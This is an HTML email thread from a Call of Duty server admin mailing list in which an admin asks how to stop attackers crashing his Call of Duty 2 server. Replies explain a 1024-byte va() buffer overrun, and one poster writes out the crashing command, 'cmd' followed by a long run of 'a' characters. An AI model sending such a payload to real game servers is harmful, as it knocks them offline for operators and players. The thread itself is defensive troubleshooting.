<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<meta content="text/html; charset=UTF-8" http-equiv="Content-Type">
</head>
<body bgcolor="#ffffff" text="#000000">
you can't<br>
<br>
El 30/01/10 0:23, <a class="moz-txt-link-abbreviated" href="mailto:david.lauriou@wanadoo.fr">david.lauriou@wanadoo.fr</a> escribió:
<blockquote cite="mid:C66C0C3409FC4FA5BF72DD7EC7629340@davidI5PC"
type="cite">where can i find BFBC2 dedicated server ?
<br>
<br>
<br>
----- Original Message ----- From: "River Hosting - Info"
<a class="moz-txt-link-rfc2396E" href="mailto:info@riverhosting.nl"><info@riverhosting.nl></a>
<br>
To: "'Call of Duty server admin list.'" <a class="moz-txt-link-rfc2396E" href="mailto:cod@icculus.org"><cod@icculus.org></a>
<br>
Sent: Monday, January 25, 2010 12:07 PM
<br>
Subject: Re: [cod] help
<br>
<br>
<br>
<blockquote type="cite"><br>
All you need is right here
<br>
<a class="moz-txt-link-freetext" href="http://www.fpsadmin.com/forum/showthread.php?t=11777">http://www.fpsadmin.com/forum/showthread.php?t=11777</a>.
<br>
<br>
Met vriendelijke groet,
<br>
With kind regards,
<br>
<br>
Julian Maartens
<br>
River Hosting
<br>
<br>
<a class="moz-txt-link-abbreviated" href="mailto:info@riverhosting.nl">info@riverhosting.nl</a>
<br>
<a class="moz-txt-link-freetext" href="http://www.riverhosting.nl">http://www.riverhosting.nl</a>
<br>
<br>
-----Oorspronkelijk bericht-----
<br>
Van: Bong-Master [<a class="moz-txt-link-freetext" href="mailto:bong-master@thesilverdagger.co.uk">mailto:bong-master@thesilverdagger.co.uk</a>]
<br>
Verzonden: maandag 25 januari 2010 12:03
<br>
Aan: Call of Duty server admin list.
<br>
Onderwerp: Re: [cod] help
<br>
<br>
My computer illiterate wife said 1.3 will fix this.
<br>
<br>
--------------------------------------------------
<br>
From: "pet" <a class="moz-txt-link-rfc2396E" href="mailto:games@maxrate.pl"><games@maxrate.pl></a>
<br>
Sent: Monday, January 25, 2010 10:53 AM
<br>
To: "Call of Duty server admin list." <a class="moz-txt-link-rfc2396E" href="mailto:cod@icculus.org"><cod@icculus.org></a>
<br>
Subject: [cod] help
<br>
<br>
<blockquote type="cite">Hi all members
<br>
<br>
I have problems with crazy hackers which hacks my servers all the time.
I
<br>
mean call of duty 2 1.0. I know that You will say, change into 1.3, but
<br>
this is not the solution. Couple times a day somebody hacks my server
and
<br>
its shutdown, after that I see in console "ERROR: Attempted to overrun
<br>
string in call to va()". How can I secure my server against this
suckers
<br>
which have nothing better to do with theirs empty brains. Please help.
<br>
<br>
Pet
<br>
<br>
<br>
"va() is a function of the Quake 3 engine used to quickly build strings
<br>
using snprintf and a static destination buffer.
<br>
Read more on: : i3D.net Game Forums
<br>
<br>
</blockquote>
<a class="moz-txt-link-freetext" href="http://forum.i3d.net/call-duty-series-newsletter/48158-cod-cod-ww-1024-bytes">http://forum.i3d.net/call-duty-series-newsletter/48158-cod-cod-ww-1024-bytes</a>
<br>
-command-exploit.html
<br>
<blockquote type="cite">If the generated string is longer than the
available buffer the server
<br>
shows an "Attempted to overrun string in call to va()" error and
<br>
terminates.
<br>
>From Call of Duty 2 (and consequently) the size of this buffer has
<br>
been reduced from the original 32000 bytes to only 1024 causing many
<br>
problems to the admins.
<br>
<br>
So in CoD5 an attacker which has joined the server can exploit this
<br>
vulnerability through the sending of a command longer than 1024 bytes
<br>
causing the immediate termination of the server."
<br>
<br>
I try it, and it works. I you send this command to the server, it will
<br>
crash:
<br>
<br>
cmd aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
<br>
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
<br>
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
<br>
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
<br>
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
<br>
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
<br>
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
<br>
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
<br>
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
<br>
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
<br>
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
<br>
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
<br>
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
<br>
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
<br>
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
<br>
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
<br>
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
<br>
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
<br>
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
<br>
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
<br>
aaaaaaaaaaaaaaaaaaaaaaaa
<br>
<br>
<br>
so
<br>
_______________________________________________
<br>
cod mailing list
<br>
<a class="moz-txt-link-abbreviated" href="mailto:cod@icculus.org">cod@icculus.org</a>
<br>
<a class="moz-txt-link-freetext" href="http://icculus.org/mailman/listinfo/cod">http://icculus.org/mailman/listinfo/cod</a>
<br>
</blockquote>
<br>
_______________________________________________
<br>
cod mailing list
<br>
<a class="moz-txt-link-abbreviated" href="mailto:cod@icculus.org">cod@icculus.org</a>
<br>
<a class="moz-txt-link-freetext" href="http://icculus.org/mailman/listinfo/cod">http://icculus.org/mailman/listinfo/cod</a>
<br>
<br>
_______________________________________________
<br>
cod mailing list
<br>
<a class="moz-txt-link-abbreviated" href="mailto:cod@icculus.org">cod@icculus.org</a>
<br>
<a class="moz-txt-link-freetext" href="http://icculus.org/mailman/listinfo/cod">http://icculus.org/mailman/listinfo/cod</a>
<br>
<br>
</blockquote>
<br>
<br>
_______________________________________________
<br>
cod mailing list
<br>
<a class="moz-txt-link-abbreviated" href="mailto:cod@icculus.org">cod@icculus.org</a>
<br>
<a class="moz-txt-link-freetext" href="http://icculus.org/mailman/listinfo/cod">http://icculus.org/mailman/listinfo/cod</a>
<br>
<br>
</blockquote>
<br>
<div class="moz-signature">-- <br>
<meta content="text/html; charset=UTF-8" http-equiv="Content-Type">
<title></title>
<br>
<div class="moz-signature">
<pre class="moz-signature" cols="72"><font color="#3333ff"><b>David Aguilar Valero</b></font>
Dpto. Comercial y Soporte técnico
NewLight Systems
<b><font color="#3333ff">S</font><font color="#3333ff">ervidores de juegos, HW, Dedicados</font></b>
<b><font color="#3333ff"><a class="moz-txt-link-abbreviated"
href="mailto:crk01@nls.es">crk01@nls.es</a></font></b>
<a class="moz-txt-link-abbreviated"
href="mailto:crk01@newlightsystems.com">crk01@newlightsystems.com</a>
<a class="moz-txt-link-abbreviated"
href="mailto:tecnico@newlightsystems.com">tecnico@newlightsystems.com</a>
#NewLight_Systems @ irc-hispano.org
<font color="#3333ff"><b><a class="moz-txt-link-abbreviated"
href="http://www.newlightsystems.com">www.newlightsystems.com</a>
<a class="moz-txt-link-abbreviated" href="http://www.nls.es">www.nls.es</a></b></font></pre>
</div>
This email and any files or attachments transmitted with it are
intended solely for the use of the intended recipient. This email is
confidential and may contain legally privileged information. If you are
not the intended recipient you should not read, disseminate,
distribute, or copy this email. If you have received this email in
error, please notify the sender immediately and delete it from your
system.
</div>
</body>
</html>